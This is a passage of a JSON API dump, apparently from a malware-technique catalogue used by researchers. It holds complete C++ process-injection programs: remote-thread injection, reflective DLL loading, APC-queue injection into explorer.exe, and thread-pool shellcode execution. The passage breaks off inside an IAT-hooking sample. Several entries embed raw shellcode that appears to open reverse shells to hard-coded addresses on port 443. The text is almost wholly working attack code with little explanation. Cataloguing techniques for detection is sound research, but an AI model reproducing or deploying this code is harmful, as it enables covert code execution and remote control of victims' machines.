            "plain_code": "#include \"stdafx.h\"\r\n#include \"Windows.h\"\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n\tunsigned char shellcode[] =\r\n\t\t\"\\x48\\x31\\xc9\\x48\\x81\\xe9\\xc6\\xff\\xff\\xff\\x48\\x8d\\x05\\xef\\xff\"\r\n\t\t\"\\xff\\xff\\x48\\xbb\\x1d\\xbe\\xa2\\x7b\\x2b\\x90\\xe1\\xec\\x48\\x31\\x58\"\r\n\t\t\"\\x27\\x48\\x2d\\xf8\\xff\\xff\\xff\\xe2\\xf4\\xe1\\xf6\\x21\\x9f\\xdb\\x78\"\r\n\t\t\"\\x21\\xec\\x1d\\xbe\\xe3\\x2a\\x6a\\xc0\\xb3\\xbd\\x4b\\xf6\\x93\\xa9\\x4e\"\r\n\t\t\"\\xd8\\x6a\\xbe\\x7d\\xf6\\x29\\x29\\x33\\xd8\\x6a\\xbe\\x3d\\xf6\\x29\\x09\"\r\n\t\t\"\\x7b\\xd8\\xee\\x5b\\x57\\xf4\\xef\\x4a\\xe2\\xd8\\xd0\\x2c\\xb1\\x82\\xc3\"\r\n\t\t\"\\x07\\x29\\xbc\\xc1\\xad\\xdc\\x77\\xaf\\x3a\\x2a\\x51\\x03\\x01\\x4f\\xff\"\r\n\t\t\"\\xf3\\x33\\xa0\\xc2\\xc1\\x67\\x5f\\x82\\xea\\x7a\\xfb\\x1b\\x61\\x64\\x1d\"\r\n\t\t\"\\xbe\\xa2\\x33\\xae\\x50\\x95\\x8b\\x55\\xbf\\x72\\x2b\\xa0\\xd8\\xf9\\xa8\"\r\n\t\t\"\\x96\\xfe\\x82\\x32\\x2a\\x40\\x02\\xba\\x55\\x41\\x6b\\x3a\\xa0\\xa4\\x69\"\r\n\t\t\"\\xa4\\x1c\\x68\\xef\\x4a\\xe2\\xd8\\xd0\\x2c\\xb1\\xff\\x63\\xb2\\x26\\xd1\"\r\n\t\t\"\\xe0\\x2d\\x25\\x5e\\xd7\\x8a\\x67\\x93\\xad\\xc8\\x15\\xfb\\x9b\\xaa\\x5e\"\r\n\t\t\"\\x48\\xb9\\xa8\\x96\\xfe\\x86\\x32\\x2a\\x40\\x87\\xad\\x96\\xb2\\xea\\x3f\"\r\n\t\t\"\\xa0\\xd0\\xfd\\xa5\\x1c\\x6e\\xe3\\xf0\\x2f\\x18\\xa9\\xed\\xcd\\xff\\xfa\"\r\n\t\t\"\\x3a\\x73\\xce\\xb8\\xb6\\x5c\\xe6\\xe3\\x22\\x6a\\xca\\xa9\\x6f\\xf1\\x9e\"\r\n\t\t\"\\xe3\\x29\\xd4\\x70\\xb9\\xad\\x44\\xe4\\xea\\xf0\\x39\\x79\\xb6\\x13\\xe2\"\r\n\t\t\"\\x41\\xff\\x32\\x95\\xe7\\x92\\xde\\x42\\x8d\\x90\\x7b\\x2b\\xd1\\xb7\\xa5\"\r\n\t\t\"\\x94\\x58\\xea\\xfa\\xc7\\x30\\xe0\\xec\\x1d\\xf7\\x2b\\x9e\\x62\\x2c\\xe3\"\r\n\t\t\"\\xec\\x1c\\x05\\xa8\\x7b\\x2b\\x95\\xa0\\xb8\\x54\\x37\\x46\\x37\\xa2\\x61\"\r\n\t\t\"\\xa0\\x56\\x51\\xc9\\x84\\x7c\\xd4\\x45\\xad\\x65\\xf7\\xd6\\xa3\\x7a\\x2b\"\r\n\t\t\"\\x90\\xb8\\xad\\xa7\\x97\\x22\\x10\\x2b\\x6f\\x34\\xbc\\x4d\\xf3\\x93\\xb2\"\r\n\t\t\"\\x66\\xa1\
\x21\\xa4\\xe2\\x7e\\xea\\xf2\\xe9\\xd8\\x1e\\x2c\\x55\\x37\\x63\"\r\n\t\t\"\\x3a\\x91\\x7a\\xee\\x33\\xfd\\x41\\x77\\x33\\xa2\\x57\\x8b\\xfc\\x5c\\xe6\"\r\n\t\t\"\\xee\\xf2\\xc9\\xd8\\x68\\x15\\x5c\\x04\\x3b\\xde\\x5f\\xf1\\x1e\\x39\\x55\"\r\n\t\t\"\\x3f\\x66\\x3b\\x29\\x90\\xe1\\xa5\\xa5\\xdd\\xcf\\x1f\\x2b\\x90\\xe1\\xec\"\r\n\t\t\"\\x1d\\xff\\xf2\\x3a\\x7b\\xd8\\x68\\x0e\\x4a\\xe9\\xf5\\x36\\x1a\\x50\\x8b\"\r\n\t\t\"\\xe1\\x44\\xff\\xf2\\x99\\xd7\\xf6\\x26\\xa8\\x39\\xea\\xa3\\x7a\\x63\\x1d\"\r\n\t\t\"\\xa5\\xc8\\x05\\x78\\xa2\\x13\\x63\\x19\\x07\\xba\\x4d\\xff\\xf2\\x3a\\x7b\"\r\n\t\t\"\\xd1\\xb1\\xa5\\xe2\\x7e\\xe3\\x2b\\x62\\x6f\\x29\\xa1\\x94\\x7f\\xee\\xf2\"\r\n\t\t\"\\xea\\xd1\\x5b\\x95\\xd1\\x81\\x24\\x84\\xfe\\xd8\\xd0\\x3e\\x55\\x41\\x68\"\r\n\t\t\"\\xf0\\x25\\xd1\\x5b\\xe4\\x9a\\xa3\\xc2\\x84\\xfe\\x2b\\x11\\x59\\xbf\\xe8\"\r\n\t\t\"\\xe3\\xc1\\x8d\\x05\\x5c\\x71\\xe2\\x6b\\xea\\xf8\\xef\\xb8\\xdd\\xea\\x61\"\r\n\t\t\"\\xb4\\x22\\x80\\xcb\\xe5\\xe4\\x57\\x5a\\xad\\xd0\\x14\\x41\\x90\\xb8\\xad\"\r\n\t\t\"\\x94\\x64\\x5d\\xae\\x2b\\x90\\xe1\\xec\";\r\n\r\n\tHANDLE processHandle;\r\n\tHANDLE remoteThread;\r\n\tPVOID remoteBuffer;\r\n\r\n\tprintf(\"Injecting to PID: %i\", atoi(argv[1]));\r\n\tprocessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));\r\n\tremoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);\r\n\tWriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);\r\n\tremoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);\r\n\tCloseHandle(processHandle);\r\n\r\n    return 0;\r\n}"
        },
        {
            "id": 87,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 6,
                "username": "Unprotect",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/hashtag/unprotectproject",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/110/?format=api",
            "description": "Original source: https://www.ired.team/offensive-security/code-injection-process-injection/reflective-dll-injection",
            "plain_code": "#include \"pch.h\"\r\n#include <iostream>\r\n#include <Windows.h>\r\n\r\ntypedef struct BASE_RELOCATION_BLOCK {\r\n\tDWORD PageAddress;\r\n\tDWORD BlockSize;\r\n} BASE_RELOCATION_BLOCK, *PBASE_RELOCATION_BLOCK;\r\n\r\ntypedef struct BASE_RELOCATION_ENTRY {\r\n\tUSHORT Offset : 12;\r\n\tUSHORT Type : 4;\r\n} BASE_RELOCATION_ENTRY, *PBASE_RELOCATION_ENTRY;\r\n\r\nusing DLLEntry = BOOL(WINAPI *)(HINSTANCE dll, DWORD reason, LPVOID reserved);\r\n\r\nint main()\r\n{\r\n\t// get this module's image base address\r\n\tPVOID imageBase = GetModuleHandleA(NULL);\r\n\r\n\t// load DLL into memory\r\n\tHANDLE dll = CreateFileA(\"\\\\\\\\VBOXSVR\\\\Experiments\\\\MLLoader\\\\MLLoader\\\\x64\\\\Debug\\\\dll.dll\", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);\r\n\tDWORD64 dllSize = GetFileSize(dll, NULL);\r\n\tLPVOID dllBytes = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dllSize);\r\n\tDWORD outSize = 0; \r\n\tReadFile(dll, dllBytes, dllSize, &outSize, NULL);\r\n\r\n\t// get pointers to in-memory DLL headers\r\n\tPIMAGE_DOS_HEADER dosHeaders = (PIMAGE_DOS_HEADER)dllBytes;\r\n\tPIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)dllBytes + dosHeaders->e_lfanew);\r\n\tSIZE_T dllImageSize = ntHeaders->OptionalHeader.SizeOfImage;\r\n\r\n\t// allocate new memory space for the DLL. 
Try to allocate memory in the image's preferred base address, but don't stress if the memory is allocated elsewhere\r\n\t//LPVOID dllBase = VirtualAlloc((LPVOID)0x000000191000000, dllImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\tLPVOID dllBase = VirtualAlloc((LPVOID)ntHeaders->OptionalHeader.ImageBase, dllImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\t\t\t\r\n\t// get delta between this module's image base and the DLL that was read into memory\r\n\tDWORD_PTR deltaImageBase = (DWORD_PTR)dllBase - (DWORD_PTR)ntHeaders->OptionalHeader.ImageBase;\r\n\r\n\t// copy over DLL image headers to the newly allocated space for the DLL\r\n\tstd::memcpy(dllBase, dllBytes, ntHeaders->OptionalHeader.SizeOfHeaders);\r\n\r\n\t// copy over DLL image sections to the newly allocated space for the DLL\r\n\tPIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION(ntHeaders);\r\n\tfor (size_t i = 0; i < ntHeaders->FileHeader.NumberOfSections; i++)\r\n\t{\r\n\t\tLPVOID sectionDestination = (LPVOID)((DWORD_PTR)dllBase + (DWORD_PTR)section->VirtualAddress);\r\n\t\tLPVOID sectionBytes = (LPVOID)((DWORD_PTR)dllBytes + (DWORD_PTR)section->PointerToRawData);\r\n\t\tstd::memcpy(sectionDestination, sectionBytes, section->SizeOfRawData);\r\n\t\tsection++;\r\n\t}\r\n\r\n\t// perform image base relocations\r\n\tIMAGE_DATA_DIRECTORY relocations = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];\r\n\tDWORD_PTR relocationTable = relocations.VirtualAddress + (DWORD_PTR)dllBase;\r\n\tDWORD relocationsProcessed = 0;\r\n\r\n\twhile (relocationsProcessed < relocations.Size) \r\n\t{\r\n\t\tPBASE_RELOCATION_BLOCK relocationBlock = (PBASE_RELOCATION_BLOCK)(relocationTable + relocationsProcessed);\r\n\t\trelocationsProcessed += sizeof(BASE_RELOCATION_BLOCK);\r\n\t\tDWORD relocationsCount = (relocationBlock->BlockSize - sizeof(BASE_RELOCATION_BLOCK)) / sizeof(BASE_RELOCATION_ENTRY);\r\n\t\tPBASE_RELOCATION_ENTRY relocationEntries = 
(PBASE_RELOCATION_ENTRY)(relocationTable + relocationsProcessed);\r\n\r\n\t\tfor (DWORD i = 0; i < relocationsCount; i++)\r\n\t\t{\r\n\t\t\trelocationsProcessed += sizeof(BASE_RELOCATION_ENTRY);\r\n\r\n\t\t\tif (relocationEntries[i].Type == 0)\r\n\t\t\t{\r\n\t\t\t\tcontinue;\r\n\t\t\t}\r\n\r\n\t\t\tDWORD_PTR relocationRVA = relocationBlock->PageAddress + relocationEntries[i].Offset;\r\n\t\t\tDWORD_PTR addressToPatch = 0;\r\n\t\t\tReadProcessMemory(GetCurrentProcess(), (LPCVOID)((DWORD_PTR)dllBase + relocationRVA), &addressToPatch, sizeof(DWORD_PTR), NULL);\r\n\t\t\taddressToPatch += deltaImageBase;\r\n\t\t\tstd::memcpy((PVOID)((DWORD_PTR)dllBase + relocationRVA), &addressToPatch, sizeof(DWORD_PTR));\r\n\t\t}\r\n\t}\r\n\t\r\n\t// resolve import address table\r\n\tPIMAGE_IMPORT_DESCRIPTOR importDescriptor = NULL;\r\n\tIMAGE_DATA_DIRECTORY importsDirectory = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];\r\n\timportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(importsDirectory.VirtualAddress + (DWORD_PTR)dllBase);\r\n\tLPCSTR libraryName = \"\";\r\n\tHMODULE library = NULL;\r\n\r\n\twhile (importDescriptor->Name != NULL)\r\n\t{\r\n\t\tlibraryName = (LPCSTR)importDescriptor->Name + (DWORD_PTR)dllBase;\r\n\t\tlibrary = LoadLibraryA(libraryName);\r\n\t\t\r\n\t\tif (library)\r\n\t\t{\r\n\t\t\tPIMAGE_THUNK_DATA thunk = NULL;\r\n\t\t\tthunk = (PIMAGE_THUNK_DATA)((DWORD_PTR)dllBase + importDescriptor->FirstThunk);\r\n\r\n\t\t\twhile (thunk->u1.AddressOfData != NULL)\r\n\t\t\t{\r\n\t\t\t\tif (IMAGE_SNAP_BY_ORDINAL(thunk->u1.Ordinal))\r\n\t\t\t\t{\r\n\t\t\t\t\tLPCSTR functionOrdinal = (LPCSTR)IMAGE_ORDINAL(thunk->u1.Ordinal);\r\n\t\t\t\t\tthunk->u1.Function = (DWORD_PTR)GetProcAddress(library, functionOrdinal);\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\tPIMAGE_IMPORT_BY_NAME functionName = (PIMAGE_IMPORT_BY_NAME)((DWORD_PTR)dllBase + thunk->u1.AddressOfData);\r\n\t\t\t\t\tDWORD_PTR functionAddress = (DWORD_PTR)GetProcAddress(library, 
functionName->Name);\r\n\t\t\t\t\tthunk->u1.Function = functionAddress;\r\n\t\t\t\t}\r\n\t\t\t\t++thunk;\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\timportDescriptor++;\r\n\t}\r\n\r\n\t// execute the loaded DLL\r\n\tDLLEntry DllEntry = (DLLEntry)((DWORD_PTR)dllBase + ntHeaders->OptionalHeader.AddressOfEntryPoint);\r\n\t(*DllEntry)((HINSTANCE)dllBase, DLL_PROCESS_ATTACH, 0);\r\n\r\n\tCloseHandle(dll);\r\n\tHeapFree(GetProcessHeap(), 0, dllBytes);\r\n\r\n\treturn 0;\r\n}"
        },
        {
            "id": 88,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 6,
                "username": "Unprotect",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/hashtag/unprotectproject",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/113/?format=api",
            "description": "Original source: https://www.ired.team/offensive-security/code-injection-process-injection/apc-queue-code-injection",
            "plain_code": "#include \"pch.h\"\r\n#include <iostream>\r\n#include <Windows.h>\r\n#include <TlHelp32.h>\r\n#include <vector>\r\n\r\nint main()\r\n{\r\n\tunsigned char buf[] = \"\\xfc\\x48\\x83\\xe4\\xf0\\xe8\\xcc\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\\x20\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\\xed\\x52\\x41\\x51\\x48\\x8b\\x52\\x20\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x66\\x81\\x78\\x18\\x0b\\x02\\x0f\\x85\\x72\\x00\\x00\\x00\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x67\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\\x49\\x01\\xd0\\xe3\\x56\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\x38\\xe0\\x75\\xf1\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\\x75\\xd8\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\\x59\\x5a\\x48\\x8b\\x12\\xe9\\x4b\\xff\\xff\\xff\\x5d\\x49\\xbe\\x77\\x73\\x32\\x5f\\x33\\x32\\x00\\x00\\x41\\x56\\x49\\x89\\xe6\\x48\\x81\\xec\\xa0\\x01\\x00\\x00\\x49\\x89\\xe5\\x49\\xbc\\x02\\x00\\x01\\xbb\\x0a\\x00\\x00\\x05\\x41\\x54\\x49\\x89\\xe4\\x4c\\x89\\xf1\\x41\\xba\\x4c\\x77\\x26\\x07\\xff\\xd5\\x4c\\x89\\xea\\x68\\x01\\x01\\x00\\x00\\x59\\x41\\xba\\x29\\x80\\x6b\\x00\\xff\\xd5\\x6a\\x0a\\x41\\x5e\\x50\\x50\\x4d\\x31\\xc9\\x4d\\x31\\xc0\\x48\\xff\\xc0\\x48\\x89\\xc2\\x48\\xff\\xc0\\x48\\x89\\xc1\\x41\\xba\\xea\\x0f\\xdf\\xe0\\xff\\xd5\\x48\\x89\\xc7\\x6a\\x10\\x41\\x58\\x4c\\x89\\xe2\\x48\\x89\\xf9\\x41\\xba\\x99\\xa5\\x74\\x61\\xff\\xd5\\x85\\xc0\\x74\\x0a\\x49\\xff\\xce\\x75\\xe5\\xe8\\x93\\x00\\x00\\x00\\x48\\x83\\xec\\x10\\x48\\x89\\xe2\\x4d\\x31\\xc9\\x6a\\x0
4\\x41\\x58\\x48\\x89\\xf9\\x41\\xba\\x02\\xd9\\xc8\\x5f\\xff\\xd5\\x83\\xf8\\x00\\x7e\\x55\\x48\\x83\\xc4\\x20\\x5e\\x89\\xf6\\x6a\\x40\\x41\\x59\\x68\\x00\\x10\\x00\\x00\\x41\\x58\\x48\\x89\\xf2\\x48\\x31\\xc9\\x41\\xba\\x58\\xa4\\x53\\xe5\\xff\\xd5\\x48\\x89\\xc3\\x49\\x89\\xc7\\x4d\\x31\\xc9\\x49\\x89\\xf0\\x48\\x89\\xda\\x48\\x89\\xf9\\x41\\xba\\x02\\xd9\\xc8\\x5f\\xff\\xd5\\x83\\xf8\\x00\\x7d\\x28\\x58\\x41\\x57\\x59\\x68\\x00\\x40\\x00\\x00\\x41\\x58\\x6a\\x00\\x5a\\x41\\xba\\x0b\\x2f\\x0f\\x30\\xff\\xd5\\x57\\x59\\x41\\xba\\x75\\x6e\\x4d\\x61\\xff\\xd5\\x49\\xff\\xce\\xe9\\x3c\\xff\\xff\\xff\\x48\\x01\\xc3\\x48\\x29\\xc6\\x48\\x85\\xf6\\x75\\xb4\\x41\\xff\\xe7\\x58\\x6a\\x00\\x59\\x49\\xc7\\xc2\\xf0\\xb5\\xa2\\x56\\xff\\xd5\";\r\n\r\n\tHANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS | TH32CS_SNAPTHREAD, 0);\r\n\tHANDLE victimProcess = NULL;\r\n\tPROCESSENTRY32 processEntry = { sizeof(PROCESSENTRY32) };\r\n\tTHREADENTRY32 threadEntry = { sizeof(THREADENTRY32) };\r\n\tstd::vector<DWORD> threadIds;\r\n\tSIZE_T shellSize = sizeof(buf);\r\n\tHANDLE threadHandle = NULL;\r\n\r\n\tif (Process32First(snapshot, &processEntry)) {\r\n\t\twhile (_wcsicmp(processEntry.szExeFile, L\"explorer.exe\") != 0) {\r\n\t\t\tProcess32Next(snapshot, &processEntry);\r\n\t\t}\r\n\t}\r\n\t\r\n\tvictimProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, processEntry.th32ProcessID);\r\n\tLPVOID shellAddress = VirtualAllocEx(victimProcess, NULL, shellSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\tPTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)shellAddress;\r\n\tWriteProcessMemory(victimProcess, shellAddress, buf, shellSize, NULL);\r\n\r\n\tif (Thread32First(snapshot, &threadEntry)) {\r\n\t\tdo {\r\n\t\t\tif (threadEntry.th32OwnerProcessID == processEntry.th32ProcessID) {\r\n\t\t\t\tthreadIds.push_back(threadEntry.th32ThreadID);\r\n\t\t\t}\r\n\t\t} while (Thread32Next(snapshot, &threadEntry));\r\n\t}\r\n\t\r\n\tfor (DWORD threadId : threadIds) {\r\n\t\tthreadHandle = 
OpenThread(THREAD_ALL_ACCESS, TRUE, threadId);\r\n\t\tQueueUserAPC((PAPCFUNC)apcRoutine, threadHandle, NULL);\r\n\t\tSleep(1000 * 2);\r\n\t}\r\n\t\r\n\treturn 0;\r\n}"
        },
        {
            "id": 89,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 6,
                "username": "Unprotect",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/hashtag/unprotectproject",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/181/?format=api",
            "description": "Original source code: https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-via-createthreadpoolwait\r\n\r\nThe first thing the code does is allocate read-write-execute (RWX) memory for the shellcode using the `VirtualAlloc` function. This memory will be used to store the shellcode and execute it. Next, the code uses the `CreateThreadpoolWait` function to create a wait object and specify the address of the shellcode as the callback function. The code then uses the `SetThreadpoolWait` function to set the wait object created in the previous step. Finally, the code uses the `WaitForSingleObject` function to wait for the wait object to become signaled. When the wait object is signaled, the callback function (which contains the shellcode) is executed.",
            "plain_code": "#include <windows.h>\r\n#include <threadpoolapiset.h>\r\n\r\nunsigned char shellcode[] = \r\n\"\\xfc\\x48\\x83\\xe4\\xf0\\xe8\\xc0\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\"\r\n\"\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\"\r\n\"\\x8b\\x52\\x20\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\"\r\n\"\\x48\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\"\r\n\"\\x01\\xc1\\xe2\\xed\\x52\\x41\\x51\\x48\\x8b\\x52\\x20\\x8b\\x42\\x3c\\x48\"\r\n\"\\x01\\xd0\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x67\\x48\\x01\"\r\n\"\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\\x49\\x01\\xd0\\xe3\\x56\\x48\"\r\n\"\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\"\r\n\"\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\x38\\xe0\\x75\\xf1\\x4c\\x03\\x4c\"\r\n\"\\x24\\x08\\x45\\x39\\xd1\\x75\\xd8\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\"\r\n\"\\x66\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\"\r\n\"\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\"\r\n\"\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\\x59\\x5a\\x48\"\r\n\"\\x8b\\x12\\xe9\\x57\\xff\\xff\\xff\\x5d\\x49\\xbe\\x77\\x73\\x32\\x5f\\x33\"\r\n\"\\x32\\x00\\x00\\x41\\x56\\x49\\x89\\xe6\\x48\\x81\\xec\\xa0\\x01\\x00\\x00\"\r\n\"\\x49\\x89\\xe5\\x49\\xbc\\x02\\x00\\x01\\xbb\\xc0\\xa8\\x38\\x66\\x41\\x54\"\r\n\"\\x49\\x89\\xe4\\x4c\\x89\\xf1\\x41\\xba\\x4c\\x77\\x26\\x07\\xff\\xd5\\x4c\"\r\n\"\\x89\\xea\\x68\\x01\\x01\\x00\\x00\\x59\\x41\\xba\\x29\\x80\\x6b\\x00\\xff\"\r\n\"\\xd5\\x50\\x50\\x4d\\x31\\xc9\\x4d\\x31\\xc0\\x48\\xff\\xc0\\x48\\x89\\xc2\"\r\n\"\\x48\\xff\\xc0\\x48\\x89\\xc1\\x41\\xba\\xea\\x0f\\xdf\\xe0\\xff\\xd5\\x48\"\r\n\"\\x89\\xc7\\x6a\\x10\\x41\\x58\\x4c\\x89\\xe2\\x48\\x89\\xf9\\x41\\xba\\x99\"\r\n\"\\xa5\\x74\\x61\\xff\\xd5\\x48\\x81\\xc4\\x40\\x02\\x00\\x00\\x49\\xb8\\x63\"\r\n\"\\x6d\\x64\\x00\\x00\\x00\\x00\\x00\\x41\\x50\\x41\\
x50\\x48\\x89\\xe2\\x57\"\r\n\"\\x57\\x57\\x4d\\x31\\xc0\\x6a\\x0d\\x59\\x41\\x50\\xe2\\xfc\\x66\\xc7\\x44\"\r\n\"\\x24\\x54\\x01\\x01\\x48\\x8d\\x44\\x24\\x18\\xc6\\x00\\x68\\x48\\x89\\xe6\"\r\n\"\\x56\\x50\\x41\\x50\\x41\\x50\\x41\\x50\\x49\\xff\\xc0\\x41\\x50\\x49\\xff\"\r\n\"\\xc8\\x4d\\x89\\xc1\\x4c\\x89\\xc1\\x41\\xba\\x79\\xcc\\x3f\\x86\\xff\\xd5\"\r\n\"\\x48\\x31\\xd2\\x48\\xff\\xca\\x8b\\x0e\\x41\\xba\\x08\\x87\\x1d\\x60\\xff\"\r\n\"\\xd5\\xbb\\xf0\\xb5\\xa2\\x56\\x41\\xba\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x48\"\r\n\"\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\"\r\n\"\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\\xd5\";\r\n\r\n\r\nint main()\r\n{\r\n\tHANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL);\r\n\tLPVOID shellcodeAddress = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\tRtlMoveMemory(shellcodeAddress, shellcode, sizeof(shellcode));\r\n\r\n\tPTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)shellcodeAddress, NULL, NULL);\r\n\tSetThreadpoolWait(threadPoolWait, event, NULL);\r\n\tWaitForSingleObject(event, INFINITE);\r\n\t\r\n\treturn 0;\r\n}"
        },
        {
            "id": 90,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 6,
                "username": "Unprotect",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/hashtag/unprotectproject",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/117/?format=api",
            "description": "Original source code: https://www.ired.team/offensive-security/code-injection-process-injection/import-adress-table-iat-hooking",
            "plain_code": "#include <iostream>\r\n#include <Windows.h>\r\n#include <winternl.h>\r\n\r\n// define MessageBoxA prototype\r\nusing PrototypeMessageBox = int (WINAPI *)(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType);\r\n\r\n// remember memory address of the original MessageBoxA routine\r\nPrototypeMessageBox originalMsgBox = MessageBoxA;\r\n\r\n// hooked function with malicious code that eventually calls the original MessageBoxA\r\nint hookedMessageBox(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType)\r\n{\r\n\tMessageBoxW(NULL, L\"Ola Hooked from a Rogue Senor .o.\", L\"Ola Senor o/\", 0);\r\n\t// execute the original NessageBoxA\r\n\treturn originalMsgBox(hWnd, lpText, lpCaption, uType);\r\n}\r\n\r\nint main()\r\n{\r\n\t// message box before IAT unhooking\r\n\tMessageBoxA(NULL, \"Hello Before Hooking\", \"Hello Before Hooking\", 0);\r\n\t\r\n\tLPVOID imageBase = GetModuleHandleA(NULL);\r\n\tPIMAGE_DOS_HEADER dosHeaders = (PIMAGE_DOS_HEADER)imageBase;\r\n\tPIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)imageBase + dosHeaders->e_lfanew);\r\n\r\n\tPIMAGE_IMPORT_DESCRIPTOR importDescriptor = NULL;\r\n\tIMAGE_DATA_DIRECTORY importsDirectory = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];\r\n\timportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(importsDirectory.VirtualAddress + (DWORD_PTR)imageBase);\r\n\tLPCSTR libraryName = NULL;\r\n\tHMODULE library = NULL;\r\n\tPIMAGE_IMPORT_BY_NAME functionName = NULL; \r\n\r\n\twhile (importDescriptor->Name != NULL)\r\n\t{\r\n\t\tlibraryName = (LPCSTR)importDescriptor->Name + (DWORD_PTR)imageBase;\r\n\t\tlibrary = LoadLibraryA(libraryName);\r\n\r\n\t\tif (library)\r\n\t\t{\r\n\t\t\tPIMAGE_THUNK_DATA originalFirstThunk = NULL, firstThunk = NULL;\r\n\t\t\toriginalFirstThunk = (PIMAGE_THUNK_DATA)((DWORD_PTR)imageBase + importDescriptor->OriginalFirstThunk);\r\n\t\t\tfirstThunk = (PIMAGE_THUNK_DATA)((DWORD_PTR)imageBase + importDescriptor->FirstThunk);\r\n\r\n\t\t\twhile 
